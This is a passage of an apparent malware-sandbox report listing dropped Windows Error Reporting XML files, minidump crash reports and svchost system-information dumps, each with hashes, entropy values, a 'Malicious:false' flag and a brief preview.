                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.7.2.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4738
                                    Entropy (8bit):4.487923494885262
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsmJg771I9ZmWpW8VYQYm8M4JCTPF9yq85na1sjukld:uIjf8I7yn7VcJCDRmukld
                                    MD5:959EB4B7168CF97281077B8C956E93C6
                                    SHA1:430207F9C314F00C45B14BD0A16B484244C608E3
                                    SHA-256:018A93D61489EA4D85ADCFFF70EB19CE751B147F3BD1A8362D4E7B4D367C8793
                                    SHA-512:84CE73746C89153D53BC8B602B5ADD64D675D9750C856987B7D6BA0C3C41547AF2198D72C143EBC27CC30E59E6921D7C8C062CE77AA1C962256254B494A5B76A
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427018" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):90688
                                    Entropy (8bit):3.057180183172826
                                    Encrypted:false
                                    SSDEEP:1536:rXite2s88IvUkCWtJYSlHfgQSO4/crYysPelQP:rXite2s88IvUkCWtJYSlHfgQSO4/crYV
                                    MD5:46EE4568024F7BDD1CFCE31C792D7DA9
                                    SHA1:416EF5C5476D9A1ECF818DC76995090DDE0D296E
                                    SHA-256:813469A933C072A6A1D57768690A59BDC8CC507DF5B06E5C5A8948689444E8CD
                                    SHA-512:E6E30F9F630D1F5174DFDDF1329C5B32703D681A92596AAE305F6B5851F1ACF891898E5D7F62639E54D8709DA84F89DCA8D79C0986C520F1059ED9D8F6666B7A
                                    Malicious:false
                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):13340
                                    Entropy (8bit):2.6846636652421556
                                    Encrypted:false
                                    SSDEEP:96:TiZYWFLfG3YHY0ceWAHnUYEZuq7Ctaimug8UwpfIaO1kMxgoaIKmk3:2ZDmQpqEQaO1kMxgoNFk3
                                    MD5:285E146CBD997D7426D15641CB0DCAF4
                                    SHA1:51DCDDFA847C59BB5D68559DD07F80AFA1494B26
                                    SHA-256:4F9E56C8C5352A595E78B4E2C6F971591CB266358D9CED7E0071B7130E533B5B
                                    SHA-512:C625A61DCA64F897A53D3C170825926E1CC9E40D29657C8BAC6B8ABB32E47F8B25B2A5DD118A759066F25FEC03896A9298375850992960D682134CA4D868FED5
                                    Malicious:false
                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 16 streams, Thu Jul 25 21:55:50 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):601608
                                    Entropy (8bit):3.6779650893686346
                                    Encrypted:false
                                    SSDEEP:6144:iTpGJVwfZi2Eeb9KNFpy41l+qsbuC3QEx6sTR+Y:i9Ee5KNFpJH+qBiQXsTn
                                    MD5:1E1D2561BF5A0664351C7093EE67499C
                                    SHA1:F780E7E9321E03C0A8DC8F5EA794C1EB20515B0A
                                    SHA-256:6EEB0D32BCFCA4CA843EF967695769449C3A01E677A92A7D93D4E35B2ACE28A3
                                    SHA-512:0A2319382A95AC35F07AE795442C35457F7E899BFB3221074066D2F8F2AAE09DA3A0FB5399F7383974A1F5B3BB2441AD0FB8C4AD4F2B10F759D26988EAFE1F74
                                    Malicious:false
                                    Preview:MDMP..a..... .........f........................<...........$...0).......'..T)......ts..............l.......8...........T............=..............pP..........\R..............................................................................eJ.......R......Lw......................T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8988
                                    Entropy (8bit):3.7078576131816376
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJzVs76YZqVkkgmfQ4t61ypDr89bBIIcef04uLm:R6lXJhA6YkqkgmfQ4t61jBIIVf/
                                    MD5:A3DF61CF2BCD72931DB5EA6FAEBDD57B
                                    SHA1:37967F52997BFBF2B3A7DA3F3FAEE00A4B7C22F8
                                    SHA-256:668FB2B9DD211E580EE0AD53A8FC8374A5ACBAC0A0501C5C133395D68A49BEA7
                                    SHA-512:BBB8A1AD6CAD7240AEA37FF5F9D7427D2BFD4F7D04E0814BB20F2E89AF78E08D2D306D84B956B956C33C6152AE15FD805BC3A457BE0A17EDEC80DBA13315D7F2
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.6.4.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4698
                                    Entropy (8bit):4.461886611270344
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsmJg771I9ZmWpW8VY3Ym8M4JCTEFkyq85KYsjukkd:uIjf8I7yn7VrJCxsmukkd
                                    MD5:298DE7CDEB9FE096C1E9BA16111C039D
                                    SHA1:879569E815445A81EA92A495DD19A7877938AFF6
                                    SHA-256:F4DB29308035A1D7DBF2FD356C36E9FBA515085577663E6C10D72FE1260A288E
                                    SHA-512:D47AF1DE118482D3A1B88321D2656D1CFF0483D84AB55E7EF8CB880FFC1E9DDC5FAF34FCFF2C529CB93241312D421622E47A3B9EB639C753D9745F6E2FDCD086
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427018" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):88652
                                    Entropy (8bit):3.05905046433164
                                    Encrypted:false
                                    SSDEEP:1536:ozXDili3ScTvUdDC+tybrH2DQSO4/crYysPelebVf:ozXDili3ScTvUdDC+tybrH2DQSO4/crA
                                    MD5:D4E12D4171E158B62DE7E976427DAEDF
                                    SHA1:67361CAAFAD09053031C1F833C602841B5304684
                                    SHA-256:9B7AA390B6DA100BE3B2AAB7C0B161BDDB4287E5A400323A5A49EEB5221B9C8E
                                    SHA-512:5C7C7DF0487498EBB3DC8834463FED86209376A58363DBDD94CA9FA4F6ED50FBE6EA8528CE6BAD2485C3FAA33B7B28A2A894CB99A4A7BF914C275575D87331AF
                                    Malicious:false
                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):13340
                                    Entropy (8bit):2.685828337101523
                                    Encrypted:false
                                    SSDEEP:96:TiZYWzoDDxTYLYoWNMH/UYEZZ6tdituHFWw69Js/dIiaK1EMQMmyIgk3:2ZDWs+Z9qHaK1EMQMCgk3
                                    MD5:5112A1604000A1D9537569C03F1F8919
                                    SHA1:468F4D19AC7960DF196C03BC192DD2FA1F40D472
                                    SHA-256:A3F27C657034E3A4EC3EFDE687E5AAA2CD8DDFE3E504D00D33B259D0B3F37A70
                                    SHA-512:0999E0B3EC3FA2A6F125EF973FA2E6F45D56247B8C1F8624A23B5894A5C06643327FA6D916ADA6E49D97E1598B5C87FEAD94DCE98E7E7C0E128EED902F537829
                                    Malicious:false
                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 16 streams, Thu Jul 25 21:55:55 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):548058
                                    Entropy (8bit):3.3346433588636306
                                    Encrypted:false
                                    SSDEEP:3072:XtrLdW5sFjOhxRR14Q8lW3lPZWcSZyT1CCqbFdClE3+vKC1CiYm4N:XtdWyFjsPZ3lAZuqH2E3QKC1N
                                    MD5:AFF71DEF705ECD5FCE7D81BA6FBCAE16
                                    SHA1:013A499A289A552F64B6BF9140C8E85279DE3429
                                    SHA-256:6024E7C0F4A9FFC2B5F108735DC6E1D02325664863924B36E74C1B72B62BD852
                                    SHA-512:C75470F2F83CF8030DD581545CE711E48CB4275C488F8DDEAFB525D9FBA98DA46CB92698867CA7F3878AD63673C7E749AC2C02C66870F8D10E36357E07035665
                                    Malicious:false
                                    Preview:MDMP..a..... .........f....................................$....(......4'...(.......^..............l.......8...........T............<..* ...........P...........R..............................................................................eJ.......R......Lw......................T.............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8840
                                    Entropy (8bit):3.7114744776283235
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJTwFAW6YcDNz0gmfFLsypr089bOtNf1v6m:R6lXJkFZ6Yaz0gmfFLsmOXfx
                                    MD5:3728270F6043FEAF9036E490B86C940C
                                    SHA1:3C8300EF38FD3B25927D90BC3FE7B7E0BB2A7E9C
                                    SHA-256:5DA519A3FF911120F7DBE33F8EE46B92F4FF57BDE0AB317377F6F3820C4D9000
                                    SHA-512:C876B004C383D75C0F46500D9A9913E18A3FAA22DABDE8988E4146800A152BF503F2CFD5AEF9BFEF51FBACB4741D1E6641F89C86487F1C1AA4921FDD32CDF622
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.0.<./.P.i.
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4738
                                    Entropy (8bit):4.487237687128354
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsmJg771I9ZmWpW8VYQoYm8M4JCTaFcyq854RsjukNPd:uIjf8I7yn7VrFJCn/mukNPd
                                    MD5:4160AD770FA5777CC8D7A9FCB731B7F8
                                    SHA1:64823B1D670403634CA816385AEC2FF6D91107DB
                                    SHA-256:CFB95AF141E6EA9621BD74E1D275B394B9001B01505A980D62D7EB9D7EF6CB7F
                                    SHA-512:4188FFF26B46CA8B756E81B1CDE120089207972322A07F52BF366B986D564FCAC2E5BB497E1205B15A17AB0B0BFA4D74C831910C78AF7840AE6963171E6CC902
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427018" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):90200
                                    Entropy (8bit):3.057549867709864
                                    Encrypted:false
                                    SSDEEP:1536:RDofi7xJyNn5qxF+yHUp+tt7fuHMR4eeEley+PS231G+7+lk+g+t5G+4reo+l5Bz:RDofi7xJyNn5qxF+yHUp+tt7fuHMR4eB
                                    MD5:0BD9AA24710330E848A10F4609F2023C
                                    SHA1:58EBA5E12E0D890384FC28D43F403AF7498EC379
                                    SHA-256:D11D0739E21EF6BF34F68285EA06392A08AE3A7BDC8B93BA540819726048AB28
                                    SHA-512:368FF8A623D69513A7D394AEA8D89CB40ADD04B48B3C1E46548FE38EB84D28B86A98F901E1F873814F2A122E64B7D7ADC60A089BA9DC0B104986B7E77B8BE67B
                                    Malicious:false
                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):13340
                                    Entropy (8bit):2.685436642464206
                                    Encrypted:false
                                    SSDEEP:96:TiZYWIkEcjY0YqWEHGUYEZuttdiOkbF8ewc58snay1cZM10mIzk3:2ZDFD825day1AM10hzk3
                                    MD5:95C2B9DD3C8A087496459555054D14A2
                                    SHA1:D76236D971FDA0D787688CC416729EC78977426C
                                    SHA-256:37D1907D1F838943E08A1979580AC71C14BC7F6444A132D19441FB0E463691DF
                                    SHA-512:E2EA4CEFF0F0E1B20989DE83CD53CF7C4A1CD33750BA1C102EAB80BAA1ADF94A1FD08DC9EC45B9698981C0C4C5EEB9003995613AA4F07B71F3C018220F4EC939
                                    Malicious:false
                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . 